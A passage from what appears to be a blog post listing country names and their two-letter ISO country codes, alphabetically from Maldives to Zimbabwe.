Maldives --> MV
Mali --> ML
Malta --> MT
Marshall Islands --> MH
Martinique --> MQ
Mauritania --> MR
Mauritius --> MU
Mayotte --> YT
Mexico --> MX
Micronesia --> FM
Moldova --> MD
Monaco --> MC
Mongolia --> MN
Montserrat --> MS
Morocco --> MA
Mozambique --> MZ
Namibia --> NA
Nauru --> NR
Nepal --> NP
Netherlands --> NL
Netherlands Antilles --> AN
New Caledonia --> NC
New Zealand --> NZ
Nicaragua --> NI
Niger --> NE
Nigeria --> NG
Niue --> NU
Norfolk Island --> NF
Northern Mariana Islands --> MP
Norway --> NO
Oman --> OM
Pakistan --> PK
Palau --> PW
Palestinian Territory --> PS
Panama --> PA
Papua New Guinea --> PG
Paraguay --> PY
Peru --> PE
Philippines --> PH
Pitcairn --> PN
Poland --> PL
Portugal --> PT
Puerto Rico --> PR
Qatar --> QA
Reunion --> RE
Romania --> RO
Russian Federation --> RU
Rwanda --> RW
Saint Kitts and Nevis --> KN
Saint Lucia --> LC
Saint Vincent and the Grenadines --> VC
Samoa --> WS
San Marino --> SM
Sao Tome and Principe --> ST
Saudi Arabia --> SA
Senegal --> SN
Serbia and Montenegro --> CS
Seychelles --> SC
Sierra Leone --> SL
Singapore --> SG
Slovakia --> SK
Slovenia --> SI
Solomon Islands --> SB
Somalia --> SO
South Africa --> ZA
South Georgia and The South Sandwich Islands --> GS
South Korea --> KR
Spain --> ES
Sri Lanka --> LK
St. Helena --> SH
St. Pierre and Miquelon --> PM
Suriname --> SR
Svalbard and Jan Mayen Islands --> SJ
Swaziland --> SZ
Sweden --> SE
Switzerland --> CH
Taiwan --> TW
Tajikistan --> TJ
Tanzania --> TZ
Thailand --> TH
Togo --> TG
Tokelau --> TK
Tonga --> TO
Trinidad and Tobago --> TT
Tunisia --> TN
Turkey --> TR
Turkmenistan --> TM
Turks and Caicos Islands --> TC
Tuvalu --> TV
Uganda --> UG
Ukraine --> UA
United Arab Emirates --> AE
United Kingdom --> GB
United States --> US
United States Minor Outlying Islands --> UM
Uruguay --> UY
Uzbekistan --> UZ
Vanuatu --> VU
Vatican --> VA
Venezuela --> VE
Viet Nam --> VN
Virgin Islands (British) --> VG
Virgin Islands (U.S.) --> VI
Wallis and Futuna Islands --> WF
Western Sahara --> EH
Yemen --> YE
Zambia --> ZM
Zimbabwe --> ZW
written by ejam at 03:11 am
Make a comment Permalink
| Next Page |